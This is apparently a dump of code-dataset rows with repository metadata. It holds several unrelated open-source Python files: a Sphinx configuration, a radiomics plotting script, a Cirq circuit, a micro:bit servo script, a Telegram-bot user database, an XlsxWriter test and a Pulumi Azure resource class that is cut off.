# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Speech-to-text reports from DjangoCon Europe 2015'
copyright = u'2015, Hilary Maclean and Sheryll Holley'
author = u'Hilary Maclean and Sheryll Holley'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except:
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Speech-to-textreportsfromDjangoConEurope20155'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015.tex', u'Speech-to-text reports from DjangoCon Europe 2015',
u'Hilary Maclean and Sheryll Holley', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015', u'Speech-to-text reports from DjangoCon Europe 2015',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015', u'Speech-to-text reports from DjangoCon Europe 2015',
author, 'Speech-to-textreportsfromDjangoConEurope2015', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
]
| |
e7264ccc6a71876dff805367e13c30b468a009de | 8c80f1220297b91707b42a0baee31365e69d2d1d | /build/lib/WORC/plotting/plotminmaxresponse.py | 3eef97f930d725f863784c0b8d43dbe6a91372e7 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | Sikerdebaard/WORC | 4fca18330513ea0c500a90e770beb345b427d539 | 2c7a23c0a0c7480af378b9e093f06989b3304c8b | refs/heads/master | 2020-05-25T05:02:35.060113 | 2019-05-08T07:02:30 | 2019-05-08T07:02:30 | 187,640,566 | 0 | 0 | null | 2019-05-20T12:56:28 | 2019-05-20T12:56:27 | null | UTF-8 | Python | false | false | 11,356 | py | #!/usr/bin/env python
# Copyright 2016-2019 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pandas as pd
import argparse
import WORC.labels.label_processing as lp
import os
import glob
from natsort import natsorted
import numpy as np
from PREDICT.plotting.getfeatureimages import getfeatureimages
import scipy
def main():
parser = argparse.ArgumentParser(description='Radiomics results')
parser.add_argument('-im', '--im', metavar='im',
nargs='+', dest='im', type=str, required=False,
help='List of patient image files (nii)')
parser.add_argument('-seg', '--seg', metavar='seg',
nargs='+', dest='seg', type=str, required=False,
help='List of patient segmentation files (nii)')
parser.add_argument('-imtest', '--imtest', metavar='imtest',
nargs='+', dest='imtest', type=str, required=False,
help='List of patient image files of test database (nii)')
parser.add_argument('-segtest', '--segtest', metavar='segtest',
nargs='+', dest='segtest', type=str, required=False,
help='List of patient segmentation files of test database (nii)')
parser.add_argument('-feat', '--feat', metavar='feat',
nargs='+', dest='feat', type=str, required=True,
help='List of patient feature files (HDF)')
parser.add_argument('-class', '--class', metavar='class',
nargs='+', dest='classs', type=str, required=True,
help='Classification of patients (text)')
parser.add_argument('-label_type', '--label_type', metavar='label_type',
nargs='+', dest='label_type', type=str, required=True,
help='Name of the label that was predicted')
parser.add_argument('-out', '--out', metavar='out',
nargs='+', dest='out', type=str, required=False,
help='Output folder')
args = parser.parse_args()
if type(args.classs) is list:
args.classs = ''.join(args.classs)
if type(args.label_type) is list:
args.label_type = ''.join(args.label_type)
if type(args.out) is list:
args.out = ''.join(args.out)
if type(args.feat) is list and len(args.feat) == 1:
args.feat = ''.join(args.feat)
if os.path.isdir(args.feat):
args.feat = glob.glob(args.feat + '/features_*.hdf5')
args.feat = natsorted(args.feat)
if type(args.im) is list:
args.im = ''.join(args.im)
if type(args.seg) is list:
args.seg = ''.join(args.seg)
if type(args.imtest) is list:
args.imtest = ''.join(args.imtest)
if type(args.segtest) is list:
args.segtest = ''.join(args.segtest)
# Read and stack the features
print("Reading features.")
image_features_temp = list()
for i_feat in range(len(args.feat)):
feat_temp = pd.read_hdf(args.feat[i_feat])
feat_values = feat_temp.feature_values
feat_labels = feat_temp.feature_labels
feat = {k: v for k, v in zip(feat_labels, feat_values)}
image_features_temp.append(feat)
# Get the labels and patient IDs
print("Reading class labels.")
label_type = args.label_type
label_data, image_features = lp.findlabeldata(args.classs,
label_type,
args.feat,
image_features_temp)
labels = image_features[0].keys()
featvect = dict()
flab = dict()
for l in labels:
featvect[l] = {"all": [], "1": [], "0": []}
flab[l] = {"all": [], "1": [], "0": []}
# Stack per feature type and class
print("Stacking features.")
label = label_data['label'].tolist()[0]
patient_IDs = label_data['patient_IDs'].tolist()
for imfeat, label, pid in zip(image_features, label, patient_IDs):
for fl in labels:
featvect[fl]['all'].append(imfeat[fl])
flab[fl]['all'].append(pid)
if label[0] == 0:
featvect[fl]['0'].append(imfeat[fl])
flab[fl]['0'].append(pid)
else:
featvect[fl]['1'].append(imfeat[fl])
flab[fl]['1'].append(pid)
# Save image of min and max response per feature
image_type = 'CT'
# imname = '/*/*/image.nii.gz'
# segname = '/*/*/seg*.nii.gz'
imname = '/*preop_Tumor.nii.gz'
segname = '/*Tumor_mask.nii.gz'
for fl in labels:
if 'cf_' not in fl:
features = featvect[fl]['all']
maxind = np.argmax(features)
minind = np.argmin(features)
            print('{} min {}'.format(fl, patient_IDs[minind]))
            print('{} max {}'.format(fl, patient_IDs[maxind]))
if args.im is not None:
im_min = glob.glob(os.path.join(args.im, patient_IDs[minind]) + imname)
if len(im_min) == 0:
# Search in testing folder
im_min = glob.glob(os.path.join(args.imtest, patient_IDs[minind]) + imname)[0]
else:
im_min = im_min[0]
seg_min = glob.glob(os.path.join(args.seg, patient_IDs[minind]) + segname)
if len(seg_min) == 0:
# Search in testing folder
seg_min = glob.glob(os.path.join(args.segtest, patient_IDs[minind]) + segname)[0]
else:
seg_min = seg_min[0]
im_max = glob.glob(os.path.join(args.im, patient_IDs[maxind]) + imname)
if len(im_max) == 0:
# Search in testing folder
im_max = glob.glob(os.path.join(args.imtest, patient_IDs[maxind]) + imname)[0]
else:
im_max = im_max[0]
seg_max = glob.glob(os.path.join(args.seg, patient_IDs[maxind]) + segname)
if len(seg_max) == 0:
# Search in testing folder
seg_max = glob.glob(os.path.join(args.segtest, patient_IDs[maxind]) + segname)[0]
else:
seg_max = seg_max[0]
if 'LBP' in fl:
# Save LBP image
LBPim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['LBP'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(LBPim, 3)))
LBPim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['LBP'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(LBPim, 3)))
elif 'Gabor' in fl:
# Save Gabor image
Gind = fl.index('Gabor')
Aind = fl.index('A')
gabor_settings = dict()
gabor_settings['gabor_frequencies'] = [float(fl[Gind + 6:Aind])]
try:
gabor_settings['gabor_angles'] = [float(fl[Aind + 1:Aind +1 + 4])]
except ValueError:
# 0.0: two numbers
gabor_settings['gabor_angles'] = [float(fl[Aind + 1:Aind +1 + 3])]
Gaborim = getfeatureimages(im_min, seg_min,
image_type=image_type,
gabor_settings=gabor_settings,
types=['Gabor'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Gaborim, 3)))
Gaborim = getfeatureimages(im_max, seg_max,
image_type=image_type,
gabor_settings=gabor_settings,
types=['Gabor'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Gaborim, 3)))
elif 'sf_' in fl or 'hf_' in fl or 'tf_GL' in fl:
# Save segmentation
Shapeim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['Shape'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '_seg.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Shapeim, 3)))
Shapeim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['Shape'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '_seg.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Shapeim, 3)))
# Save images
Histogramim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['Histogram'])[0]
Histogramim[Histogramim == -1000] = 0
filename = fl + '_min_' + patient_IDs[minind] + '_im.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Histogramim, 3)))
Histogramim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['Histogram'])[0]
Histogramim[Histogramim == -1000] = 0
filename = fl + '_max_' + patient_IDs[maxind] + '_im.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Histogramim, 3)))
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
55c2841b5ae6ddfc0e8c0cb6f34e33306f5fca3a | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/cirq_new/cirq_program/startCirq_pragma58.py | 8e84b65dd9e10c0774f2965011964ccb0cbd933f | [
"BSD-3-Clause"
]
| permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=11
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
class Opty(cirq.PointOptimizer):
def optimization_at(
self,
circuit: 'cirq.Circuit',
index: int,
op: 'cirq.Operation'
) -> Optional[cirq.PointOptimizationSummary]:
if (isinstance(op, cirq.ops.GateOperation) and isinstance(op.gate, cirq.CZPowGate)):
return cirq.PointOptimizationSummary(
clear_span=1,
clear_qubits=op.qubits,
new_operations=[
cirq.CZ(*op.qubits),
cirq.X.on_each(*op.qubits),
cirq.X.on_each(*op.qubits),
]
)
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.rx(1.6147786239451536).on(input_qubit[3])) # number=5
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=8
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[0])) # number=10
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=7
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_pragma58.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
]
| |
8dd7a8369a2f7b352443bc0d36d23dd32bcc554e | bf576b059cbecb0cbb8a6c885dcfded5bd685399 | /4.Python course/3.Expand course/1.Small windmill/Small windmill.py | 18c56da878b1cb6a7ef0d38234ce809b1bea040f | []
| no_license | YahboomTechnology/Superbit-expansion-board | 0d3c2fd06c5df9280d230af429931af2c48dc6d5 | 4df7e03426d486d2b2f8f649359eee2d62851083 | refs/heads/master | 2023-04-07T03:16:15.786669 | 2023-03-29T01:12:57 | 2023-03-29T01:12:57 | 206,778,307 | 13 | 8 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from microbit import *
import superbit
a = 135
display.show(Image.HEART)
superbit.servo270(superbit.S1, 135)
superbit.motor_control(superbit.M1, 255, 0)
while True:
if button_a.is_pressed():
a = a - 1
if a < 0:
a = 0
superbit.servo270(superbit.S1, a)
elif button_b.is_pressed():
a = a + 1
if a > 270:
a = 270
superbit.servo270(superbit.S1, a)
| [
"[email protected]"
]
| |
0ab091f1bac3f6b3782abb3cf2f34ba686b858fc | 6dcd5f4bb4c39e2d887e5d557e188ba4c8a75081 | /src/UsersDB.py | 3d3f2264fceef218c5169ec87a6f6ca4b65d695f | []
| no_license | Pella86/HappyRateBot | 815653033593aedc22c779025d00bddec4614f46 | f23f786a3c9dc19f2378958470d82974d018bd64 | refs/heads/master | 2020-03-22T00:16:38.670215 | 2018-07-22T11:50:53 | 2018-07-22T11:50:53 | 139,234,809 | 1 | 1 | null | 2018-07-22T06:41:21 | 2018-06-30T09:01:21 | Python | UTF-8 | Python | false | false | 4,288 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 20 12:10:14 2018
@author: Mauro
"""
#==============================================================================
# Imports
#==============================================================================
# py imports
import os
import hashlib
import string
# my imports
import Databases
import UserProfile
import random
import Logging
#==============================================================================
# logging
#==============================================================================
# create logger
log = Logging.get_logger(__name__, "WARNING")
#==============================================================================
# Helpers
#==============================================================================
def get_hash_id(personid):
pid = hashlib.sha256()
pid.update(bytes(personid))
return pid.digest()
#==============================================================================
# User database
#==============================================================================
class UsersDB:
def __init__(self):
self.folder = "./databases/user_db"
if not os.path.isdir(self.folder):
os.mkdir(self.folder)
self.database = Databases.Database(self.folder, "user_")
self.database.loadDB()
self.database.update_uid()
log.info("loaded users database")
folder = "./databases/banned_user_db"
if not os.path.isdir(folder):
os.mkdir(folder)
self.banned_database = Databases.Database(folder, "banned_user_")
def getUsersList(self):
return self.database.getValues()
def check_nickname(self, user, text):
error_message = None
alphanumeric = string.ascii_letters + string.digits
if len(text) < 3:
error_message = "too short"
elif len(text) >= 15:
error_message = "too long"
elif not all(c in alphanumeric for c in text):
error_message = "invalid character"
elif text in [u.display_id for u in self.database.getValues()]:
error_message = "already present"
if error_message is None:
user.display_id = text
self.database[user.hash_id].setData(user)
return True
else:
return error_message
def banUser(self, user):
duser = self.database[user.hash_id]
self.deleteUser(user)
def addUser(self, person, chatid):
# hash the id
hash_id = get_hash_id(person.id)
if self.database.isNew(hash_id):
log.info("added new user to database: {}".format(self.database.short_uid))
# create a unique display id
start_number = 0x10000000
stop_number = 0xFFFFFFFF
display_id = random.randint(start_number,stop_number)
log.debug("display id {}".format(display_id))
# check for uniqueness
display_id_list = [user.display_id for user in self.database.getValues()]
while display_id in display_id_list:
display_id = random.randint(start_number,stop_number)
log.debug("new display id {}".format(display_id))
# language
lang_tag = person.language_code if person.language_code else "en"
# user instance
user = UserProfile.UserProfile(hash_id, display_id, chatid, lang_tag)
data = Databases.Data(hash_id, user)
self.database.addData(data)
def deleteUser(self, user):
data = self.database[user.hash_id]
self.database.deleteItem(data)
def hGetUser(self, hash_id):
return self.database[hash_id].getData()
def getUser(self, person):
log.debug("User already in database, got user")
hash_id = get_hash_id(person.id)
return self.database[hash_id].getData()
def setUser(self, user):
self.database[user.hash_id].setData(user)
def update(self):
log.info("updating database...")
self.database.updateDB()
| [
"[email protected]"
]
| |
9980f2825f02826d27018b266928c8e25ef4e7d6 | 978248bf0f275ae688f194593aa32c267832b2b6 | /xlsxwriter/test/comparison/test_autofilter06.py | 354f84b2a2f1d14959c2854587b7e266fc15c235 | [
"BSD-2-Clause-Views"
]
| permissive | satish1337/XlsxWriter | b0c216b91be1b74d6cac017a152023aa1d581de2 | 0ab9bdded4f750246c41a439f6a6cecaf9179030 | refs/heads/master | 2021-01-22T02:35:13.158752 | 2015-03-31T20:32:28 | 2015-03-31T20:32:28 | 33,300,989 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,859 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'autofilter06.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.txt_filename = test_dir + 'xlsx_files/' + 'autofilter_data.txt'
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a simple XlsxWriter file with an autofilter.
This test corresponds to the following examples/autofilter.pl example:
Example 6. Autofilter with filter for non-blanks.
"""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
# Set the autofilter.
worksheet.autofilter('A1:D51')
# Add filter criteria.
worksheet.filter_column(0, 'x == NonBlanks')
# Open a text file with autofilter example data.
textfile = open(self.txt_filename)
# Read the headers from the first line of the input file.
headers = textfile.readline().strip("\n").split()
# Write out the headers.
worksheet.write_row('A1', headers)
# Start writing data after the headers.
row = 1
# Read the rest of the text file and write it to the worksheet.
for line in textfile:
# Split the input data based on whitespace.
data = line.strip("\n").split()
# Convert the number data from the text file.
for i, item in enumerate(data):
try:
data[i] = float(item)
except ValueError:
pass
# Simulate a blank cell in the data.
if row == 6:
data[0] = ''
# Get some of the field data.
region = data[0]
# Check for rows that match the filter.
if region != '':
# Row matches the filter, no further action required.
pass
else:
# We need to hide rows that don't match the filter.
worksheet.set_row(row, options={'hidden': True})
# Write out the row data.
worksheet.write_row(row, 0, data)
# Move on to the next worksheet row.
row += 1
textfile.close()
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
]
| |
108e02ca3f0e8e3ea1c4460e16956878f2407df1 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/network/virtual_network_tap.py | bcdbaf91e38252e9c1258aa4d97c8130368e7538 | [
"BSD-3-Clause",
"Apache-2.0"
]
| permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,511 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkTapInitArgs', 'VirtualNetworkTap']
@pulumi.input_type
class VirtualNetworkTapInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input['FrontendIPConfigurationArgs']] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VirtualNetworkTap resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input['FrontendIPConfigurationArgs'] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input['NetworkInterfaceIPConfigurationArgs'] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if destination_load_balancer_front_end_ip_configuration is not None:
pulumi.set(__self__, "destination_load_balancer_front_end_ip_configuration", destination_load_balancer_front_end_ip_configuration)
if destination_network_interface_ip_configuration is not None:
pulumi.set(__self__, "destination_network_interface_ip_configuration", destination_network_interface_ip_configuration)
if destination_port is not None:
pulumi.set(__self__, "destination_port", destination_port)
if id is not None:
pulumi.set(__self__, "id", id)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tap_name is not None:
pulumi.set(__self__, "tap_name", tap_name)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> Optional[pulumi.Input['FrontendIPConfigurationArgs']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@destination_load_balancer_front_end_ip_configuration.setter
def destination_load_balancer_front_end_ip_configuration(self, value: Optional[pulumi.Input['FrontendIPConfigurationArgs']]):
pulumi.set(self, "destination_load_balancer_front_end_ip_configuration", value)
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@destination_network_interface_ip_configuration.setter
def destination_network_interface_ip_configuration(self, value: Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']]):
pulumi.set(self, "destination_network_interface_ip_configuration", value)
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> Optional[pulumi.Input[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@destination_port.setter
def destination_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "destination_port", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tapName")
def tap_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the virtual network tap.
"""
return pulumi.get(self, "tap_name")
@tap_name.setter
def tap_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tap_name", value)
class VirtualNetworkTap(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
